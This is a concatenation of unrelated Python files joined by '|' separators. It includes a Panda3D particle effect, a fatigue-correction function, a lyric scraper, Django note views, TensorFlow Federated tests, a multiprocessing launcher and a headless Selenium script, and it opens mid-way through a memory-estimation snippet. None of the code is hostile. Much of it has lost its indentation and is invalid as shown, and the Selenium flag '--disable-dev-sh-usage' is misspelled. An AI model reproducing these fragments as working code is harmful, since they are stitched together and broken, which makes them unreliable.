tmp = np.prod(param.size())
num_floats += tmp
print(tmp)
print(num_floats)
mye = GCN.estimate_mem_consumption(10000, 600000, 2, 123)
print(torch.cuda.get_device_properties(0).total_memory)
print(torch.cuda.memory_cached(0))
print(torch.cuda.memory_allocated(0))
print(mye)
"""
|
# File: F (Python 2.4)
from pandac.PandaModules import *
from direct.interval.IntervalGlobal import *
from direct.actor import Actor
from direct.particles import ParticleEffect
from direct.particles import Particles
from direct.particles import ForceGroup
from otp.otpbase import OTPRender
from PooledEffect import PooledEffect
from EffectController import EffectController
import random
class FlamingSkull(PooledEffect, EffectController):
cardScale = 128.0
def __init__(self):
PooledEffect.__init__(self)
EffectController.__init__(self)
model = loader.loadModel('models/effects/particleMaps')
self.card = model.find('**/particleFire')
if not FlamingSkull.particleDummy:
FlamingSkull.particleDummy = render.attachNewNode(ModelNode('FlamingSkullParticleDummy'))
FlamingSkull.particleDummy.setDepthWrite(0)
FlamingSkull.particleDummy.setFogOff()
FlamingSkull.particleDummy.setLightOff()
FlamingSkull.particleDummy.setColorScaleOff()
FlamingSkull.particleDummy.setTwoSided(1)
FlamingSkull.particleDummy.setBin('fixed', 60)
FlamingSkull.particleDummy.hide(OTPRender.ShadowCameraBitmask)
self.icon = loader.loadModel('models/effects/skull')
self.icon.setBillboardAxis(0.0)
self.icon.setDepthWrite(0)
self.icon.setFogOff()
self.icon.setLightOff()
self.icon.setColorScaleOff()
self.icon.reparentTo(self)
        self.icon.setPos(self, 0, 0, -0.3)
self.icon.setBin('fixed', 65)
self.icon.hide(OTPRender.ShadowCameraBitmask)
self.f = ParticleEffect.ParticleEffect('FlamingSkull')
self.f.reparentTo(self)
self.p0 = Particles.Particles('particles-1')
self.p0.setFactory('ZSpinParticleFactory')
self.p0.setRenderer('SpriteParticleRenderer')
self.p0.setEmitter('SphereSurfaceEmitter')
self.f.addParticles(self.p0)
self.p0.setPoolSize(128)
        self.p0.setBirthRate(0.2)
self.p0.setLitterSize(1)
self.p0.setLitterSpread(0)
self.p0.setSystemLifespan(0.0)
self.p0.setLocalVelocityFlag(1)
self.p0.setSystemGrowsOlderFlag(0)
self.p0.factory.setLifespanBase(1.2)
self.p0.factory.setLifespanSpread(0.5)
self.p0.factory.setMassBase(1.0)
        self.p0.factory.setMassSpread(0.2)
self.p0.factory.setTerminalVelocityBase(400.0)
self.p0.factory.setTerminalVelocitySpread(0.0)
self.p0.factory.setInitialAngle(0.0)
self.p0.factory.setInitialAngleSpread(20.0)
self.p0.factory.enableAngularVelocity(1)
self.p0.factory.setAngularVelocity(0.0)
self.p0.factory.setAngularVelocitySpread(0.0)
self.p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
self.p0.renderer.setUserAlpha(1.0)
self.p0.renderer.setFromNode(self.card)
self.p0.renderer.setColor(Vec4(1.0, 1.0, 1.0, 1.0))
self.p0.renderer.setXScaleFlag(1)
self.p0.renderer.setYScaleFlag(1)
self.p0.renderer.setAnimAngleFlag(1)
self.p0.renderer.setInitialXScale(0.0018 * self.cardScale)
self.p0.renderer.setInitialYScale(0.0018 * self.cardScale)
self.p0.renderer.setFinalXScale(0.0001 * self.cardScale)
self.p0.renderer.setFinalYScale(0.0001 * self.cardScale)
self.p0.renderer.setNonanimatedTheta(0.0)
self.p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
self.p0.renderer.setAlphaDisable(0)
self.p0.renderer.setColorBlendMode(ColorBlendAttrib.MAdd, ColorBlendAttrib.OOneMinusFbufferAlpha, ColorBlendAttrib.OOneMinusIncomingAlpha)
self.p0.renderer.getColorInterpolationManager().addLinear(0.0, 1.0, Vec4(1.0, 1.0, 1.0, 1.0), Vec4(0, 0, 0, 1.0), 1)
self.p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
self.p0.emitter.setAmplitude(-0.75)
self.p0.emitter.setAmplitudeSpread(0.5)
self.p0.emitter.setOffsetForce(Vec3(0.0, 0.0, 4.0))
self.p0.emitter.setExplicitLaunchVector(Vec3(1.0, 0.0, 0.0))
self.p0.emitter.setRadiateOrigin(Point3(0.0, 0.0, 0.0))
self.p0.emitter.setRadius(0.5)
def createTrack(self):
self.p0.renderer.setInitialXScale(0.01 * self.cardScale)
self.p0.renderer.setInitialYScale(0.01 * self.cardScale)
self.icon.show()
self.icon.setColorScale(0, 0, 0, 0)
self.icon.setScale(1.0)
        skullFadeIn = self.icon.colorScaleInterval(3.0, Vec4(0.1, 0.1, 0, 0.25), startColorScale = Vec4(0, 0, 0, 0))
        skullFadeOut = self.icon.colorScaleInterval(1.0, Vec4(0, 0, 0, 0), startColorScale = Vec4(0.1, 0.1, 0, 0.25))
        skullPulseUp = self.icon.scaleInterval(0.05, 1.25, startScale = 1.0)
        skullPulseDown = self.icon.scaleInterval(0.05, 1.0, startScale = 1.25)
        skullPulse = Sequence(skullPulseUp, skullPulseDown)
        skullColorPulseUp = self.icon.colorScaleInterval(0.1, Vec4(0.1, 0.1, 0, 0.5), startColorScale = Vec4(0, 0, 0, 0.25))
        skullColorPulseDown = self.icon.colorScaleInterval(0.1, Vec4(0, 0, 0, 0.25), startColorScale = Vec4(0.1, 0.1, 0, 0.5))
        skullColorPulse = Sequence(skullColorPulseUp, skullColorPulseDown)
growSize = LerpFunctionInterval(self.setNewSize, 3.0, toData = 1.0, fromData = 0.001)
self.startEffect = Sequence(Func(self.p0.setBirthRate, 0.01), Func(self.p0.clearToInitial), Func(self.f.start, self, self.particleDummy), Func(self.f.reparentTo, self), Func(skullFadeIn.start), Func(skullPulse.loop), growSize, Func(skullColorPulse.loop))
self.endEffect = Sequence(Func(self.p0.setBirthRate, 100.0), Sequence(skullFadeOut, Func(skullPulse.finish), Func(skullColorPulse.finish), Func(self.icon.hide)), Wait(1.0), Func(self.cleanUpEffect))
self.track = Parallel(self.startEffect, Wait(5.0), self.endEffect)
def setNewSize(self, time):
if self.p0:
self.p0.emitter.setAmplitude(-2.0 * time)
self.p0.renderer.setFinalXScale(0.001 * time * self.cardScale)
self.p0.renderer.setFinalYScale(0.001 * time * self.cardScale)
self.p0.renderer.setUserAlpha(min(0.5 * time * 3, 0.5))
def playLaunch(self, time, targetPos):
if self.p0:
throwTrack = LerpPosInterval(self, time, targetPos)
self.fireTrack = Sequence(throwTrack, Func(self.stopLoop))
self.fireTrack.start()
def cleanUpEffect(self):
EffectController.cleanUpEffect(self)
self.checkInEffect(self)
def destroy(self):
EffectController.destroy(self)
PooledEffect.destroy(self)
|
#!/usr/bin/env python
# coding: utf-8
"""
Fatigue related corrections.
"""
import numpy as np
def goodman_haigh(cycles, uts):
"""
Effective alternating stress using the Goodman-Haigh mean stress correction for fully reversed loading (R=-1).
Parameters
----------
cycles : list
Pairs of cycle range and mean
uts : float
Material ultimate tensile strength
Returns
-------
list
Corrected stress ranges
Notes
-----
In materials science and fatigue, the Goodman relation is an equation used to quantify the interaction of mean and
alternating stresses on the fatigue life of a material.
A Goodman diagram,[1][2] sometimes called a Haigh diagram or a Haigh-Soderberg diagram,[3] is a graph of (linear)
mean stress vs. (linear) alternating stress, showing when the material fails at some given number of cycles.
A scatterplot of experimental data shown on such a plot can often be approximated by a parabola known as the Gerber
line, which can in turn be (conservatively) approximated by a straight line called the Goodman line.
Correcting the stress ranges like this can only be applied with an SN-curve with a stress ratio (R) of -1.
References
----------
1. Herbert J. Sutherland and John F. Mandell. "Optimized Goodman diagram for the analysis of fiberglass composites
used in wind turbine blades"
2. David Roylance. "Fatigue", Archived 2011-06-29 at the Wayback Machine.. 2001
3. Tapany Udomphol. "Fatigue of metals". 2007.
"""
ranges, means = zip(*cycles)
# calculate effective alternating stress
corrected_ranges = np.array(ranges) * (uts / (uts - np.array(means)))
return list(corrected_ranges)
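# Hedged usage sketch (not part of the module): applying the correction to two
# hypothetical rainflow cycles with an assumed UTS of 500 MPa. A cycle of range
# 200 and mean 100 becomes 200 * 500 / (500 - 100) = 250, while a fully
# reversed cycle (mean 0) is unchanged.
if __name__ == '__main__':
    demo_cycles = [(200.0, 100.0), (150.0, 0.0)]   # (range, mean) pairs
    print(goodman_haigh(demo_cycles, uts=500.0))   # [250.0, 150.0]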
|
import json
import lyricwikia
import random
# https://github.com/enricobacis/lyricwikia
thisLineJSON = {}
with open('topSongsJSONTimeout.txt','r') as f, open('lyricData.txt','w',errors='replace') as g:
for x in f:
x = x.rstrip()
if not x: continue
jsonLoader = json.loads(x)
if 'tracks' in jsonLoader:
for thisElement in jsonLoader['tracks']:
thisLineJSON['songName'] = thisElement['name']
thisLineJSON['songID'] = thisElement['id']
thisLineJSON['duration'] = thisElement['duration_ms']
for thisArtist in thisElement['album']['artists']:
artistName = thisArtist['name']
songName = thisElement['name']
try:
lyrics = lyricwikia.get_lyrics(artistName,songName,linesep='\n',timeout=None)
                    except Exception:
print('lyric error: not found for ' + songName + ' by ' + artistName)
lyrics = ""
thisLineJSON['lyrics'] = lyrics
thisLineJSON['artistName'] = thisArtist['name']
thisLineJSON['artistID'] = thisArtist['id']
g.write(json.dumps(thisLineJSON))
g.write('\n')
|
import json
import os
def gerrit_project_map():
# Used for mapping gerrit project names onto OBS package names
map_file = os.path.join(os.path.dirname(__file__), 'project-map.json')
    with open(map_file) as map_fh:
        project_map = json.load(map_fh)
return project_map
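# Hedged usage sketch (illustration only): the returned dict maps Gerrit project
# names to OBS package names; 'example/project' is a hypothetical key, not one
# guaranteed to exist in project-map.json.
if __name__ == '__main__':
    mapping = gerrit_project_map()
    print(mapping.get('example/project', 'no OBS package mapped'))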
|
from django.shortcuts import render, redirect
from notes.app.forms import ProfileForm, NoteForm, NoteDeleteForm
from notes.app.models import Profile, Note
def home(request):
if request.method == 'GET':
profile = Profile.objects.first()
if not profile:
form = ProfileForm()
return render(request, 'home-no-profile.html', {'form': form})
else:
notes = Note.objects.all()
return render(request, 'home-with-profile.html', {'notes': notes})
else:
form = ProfileForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'home-no-profile.html', {'form': form})
def add_note(request):
if request.method == 'GET':
form = NoteForm()
return render(request, 'note-create.html', {'form': form})
else:
form = NoteForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'note-create.html', {'form': form})
def edit_note(request, pk):
note = Note.objects.get(pk=pk)
if request.method == 'GET':
form = NoteForm(instance=note)
return render(request, 'note-edit.html', {'form': form})
else:
form = NoteForm(request.POST, instance=note)
if form.is_valid():
form.save()
return redirect('home')
else:
return render(request, 'note-edit.html', {'form': form})
def delete_note(request, pk):
note = Note.objects.get(pk=pk)
if request.method == 'GET':
form = NoteDeleteForm(instance=note)
return render(request, 'note-delete.html', {'form': form})
else:
note.delete()
return redirect('home')
def note_details(request, pk):
note = Note.objects.get(pk=pk)
return render(request, 'note-details.html', {'note': note})
def profile_details(request):
profile = Profile.objects.first()
notes = Note.objects.all()
return render(request, 'profile.html', {'profile': profile, 'notes': notes.count()})
def delete_profile(request):
profile = Profile.objects.first()
notes = Note.objects.all()
profile.delete()
notes.delete()
return redirect('home')
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_federated.python.core.api import computations
from tensorflow_federated.python.core.api import test_case
from tensorflow_federated.python.core.impl.federated_context import intrinsics
from tensorflow_federated.python.core.impl.types import computation_types
from tensorflow_federated.python.core.impl.types import placements
from tensorflow_federated.python.core.impl.types import type_conversions
from tensorflow_federated.python.core.templates import errors
from tensorflow_federated.python.core.templates import iterative_process
# Convenience aliases.
FederatedType = computation_types.FederatedType
StructType = computation_types.StructType
StructWithPythonType = computation_types.StructWithPythonType
TensorType = computation_types.TensorType
@computations.tf_computation()
def test_initialize_fn():
return tf.constant(0, tf.int32)
@computations.tf_computation(tf.int32)
def test_next_fn(state):
return state
class IterativeProcessTest(test_case.TestCase):
def test_construction_does_not_raise(self):
try:
iterative_process.IterativeProcess(test_initialize_fn, test_next_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct a valid IterativeProcess.')
def test_construction_with_empty_state_does_not_raise(self):
initialize_fn = computations.tf_computation()(lambda: ())
next_fn = computations.tf_computation(())(lambda x: (x, 1.0))
try:
iterative_process.IterativeProcess(initialize_fn, next_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct an IterativeProcess with empty state.')
def test_construction_with_unknown_dimension_does_not_raise(self):
initialize_fn = computations.tf_computation()(
lambda: tf.constant([], dtype=tf.string))
@computations.tf_computation(TensorType(shape=[None], dtype=tf.string))
def next_fn(strings):
return tf.concat([strings, tf.constant(['abc'])], axis=0)
try:
iterative_process.IterativeProcess(initialize_fn, next_fn)
except: # pylint: disable=bare-except
self.fail('Could not construct an IterativeProcess with parameter types '
'with statically unknown shape.')
def test_init_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
iterative_process.IterativeProcess(
initialize_fn=lambda: 0, next_fn=test_next_fn)
def test_next_not_tff_computation_raises(self):
with self.assertRaisesRegex(TypeError, r'Expected .*\.Computation, .*'):
iterative_process.IterativeProcess(
initialize_fn=test_initialize_fn, next_fn=lambda state: state)
def test_init_param_not_empty_raises(self):
one_arg_initialize_fn = computations.tf_computation(tf.int32)(lambda x: x)
with self.assertRaises(errors.TemplateInitFnParamNotEmptyError):
iterative_process.IterativeProcess(one_arg_initialize_fn, test_next_fn)
def test_init_state_not_assignable(self):
float_initialize_fn = computations.tf_computation()(lambda: 0.0)
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(float_initialize_fn, test_next_fn)
def test_federated_init_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
FederatedType(tf.int32, placements.CLIENTS))(lambda state: state)
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(initialize_fn, next_fn)
def test_next_state_not_assignable(self):
float_next_fn = computations.tf_computation(
tf.float32)(lambda state: tf.cast(state, tf.float32))
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(test_initialize_fn, float_next_fn)
def test_federated_next_state_not_assignable(self):
initialize_fn = computations.federated_computation()(
lambda: intrinsics.federated_value(0, placements.SERVER))
next_fn = computations.federated_computation(
initialize_fn.type_signature.result)(
intrinsics.federated_broadcast)
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(initialize_fn, next_fn)
def test_next_state_not_assignable_tuple_result(self):
float_next_fn = computations.tf_computation(
tf.float32,
tf.float32)(lambda state, x: (tf.cast(state, tf.float32), x))
with self.assertRaises(errors.TemplateStateNotAssignableError):
iterative_process.IterativeProcess(test_initialize_fn, float_next_fn)
def create_test_process(
type_spec: computation_types.Type) -> iterative_process.IterativeProcess:
@computations.tf_computation
def create_value():
return type_conversions.structure_from_tensor_type_tree(
lambda t: tf.zeros(dtype=t.dtype, shape=t.shape),
type_spec.member if type_spec.is_federated() else type_spec)
@computations.federated_computation
def init_fn():
if type_spec.is_federated():
return intrinsics.federated_eval(create_value, type_spec.placement)
else:
return create_value()
@computations.federated_computation(init_fn.type_signature.result, tf.int32)
def next_fn(state, arg):
return state, arg
return iterative_process.IterativeProcess(init_fn, next_fn)
class HasEmptyStateTest(parameterized.TestCase, test_case.TestCase):
@parameterized.named_parameters(
('simple', StructType([])),
('simple_with_python_container', StructWithPythonType([], list)),
('nested', StructType([StructType([]),
StructType([StructType([])])])),
('federated_simple', computation_types.at_server(StructType([]))),
('federated_nested',
computation_types.at_server(
StructType([StructType([]),
StructType([StructType([])])]))),
)
def test_stateless_process_is_false(self, state_type):
process = create_test_process(state_type)
self.assertFalse(iterative_process.is_stateful(process))
@parameterized.named_parameters(
('tensor', TensorType(tf.int32)),
('struct_with_tensor', StructType([TensorType(tf.int32)])),
('struct_with_python_tensor',
StructWithPythonType([TensorType(tf.int32)], list)),
('nested_state',
StructType(
[StructType([]),
StructType([StructType([TensorType(tf.int32)])])])),
('federated_simple_state',
computation_types.at_server(StructType([TensorType(tf.int32)]))),
('federated_nested_state',
computation_types.at_server(
StructType([
StructType([TensorType(tf.int32)]),
StructType([StructType([])])
]))),
)
def test_stateful_process_is_true(self, state_type):
process = create_test_process(state_type)
self.assertTrue(iterative_process.is_stateful(process))
if __name__ == '__main__':
test_case.main()
|
from .getutxomodel import GetUTXOModel
from .utxomodel import UTXOModel
from pystratis.api.blockstore.responsemodels import AddressIndexerTipModel
from pystratis.api.node.responsemodels import BlockHeaderModel, ValidateAddressModel
from pystratis.api.global_responsemodels import TransactionModel, TransactionOutputModel, \
WalletSendTransactionModel, BlockTransactionDetailsModel, BlockModel
from pystratis.api.smartcontracts.responsemodels import ReceiptModel, LocalExecutionResultModel
__all__ = [
'GetUTXOModel', 'BlockTransactionDetailsModel', 'BlockModel', 'BlockHeaderModel', 'TransactionModel',
'TransactionOutputModel', 'WalletSendTransactionModel', 'ValidateAddressModel', 'AddressIndexerTipModel',
'ReceiptModel', 'LocalExecutionResultModel', 'UTXOModel'
]
|
import os
from UCTB.utils import multiple_process
def task_func(share_queue, locker, data, parameters):
print('Child process %s with pid %s' % (parameters[0], os.getpid()))
for task in data:
print('Child process', parameters[0], 'running', task)
exec_str = 'python HMM.py --Dataset %s --City %s ' % (task[0], task[1])
if task[2] != '':
exec_str += task[2]
os.system(exec_str)
locker.acquire()
share_queue.put(None)
locker.release()
if __name__ == '__main__':
task_list = [
['Bike', 'NYC', ''],
['Bike', 'Chicago', ''],
['Bike', 'DC', ''],
['Metro', 'Chongqing', ''],
['Metro', 'Shanghai', ''],
['DiDi', 'Chengdu', ''],
['DiDi', 'Xian', ''],
['ChargeStation', 'Beijing', '']
]
n_jobs = 2
multiple_process(distribute_list=task_list,
partition_func=lambda data, i, n_job: [data[e] for e in range(len(data)) if e % n_job == i],
task_func=task_func, n_jobs=n_jobs,
reduce_func=lambda x, y: None, parameters=[])
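    # Hedged illustration (not part of the original script): the partition_func
    # above hands out tasks round-robin, so with n_jobs=2 worker 0 gets the
    # even-indexed tasks and worker 1 the odd-indexed ones.
    _partition = lambda data, i, n_job: [data[e] for e in range(len(data)) if e % n_job == i]
    assert _partition(['a', 'b', 'c', 'd'], 0, 2) == ['a', 'c']
    assert _partition(['a', 'b', 'c', 'd'], 1, 2) == ['b', 'd']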
|
import os
from selenium import webdriver
op = webdriver.ChromeOptions()
op.binary_location = os.environ.get("GOOGLE_CHROME_BIN")
op.add_argument("--headless")
op.add_argument("--no-sandbox")
op.add_argument("--disable-dev-sh-usage")
driver = webdriver.Chrome(executable_path = os.environ.get("CHROMEDRIVER_PATH"), chrome_options = op)
driver.get("https://youtube.com")
print(driver.page_source)
|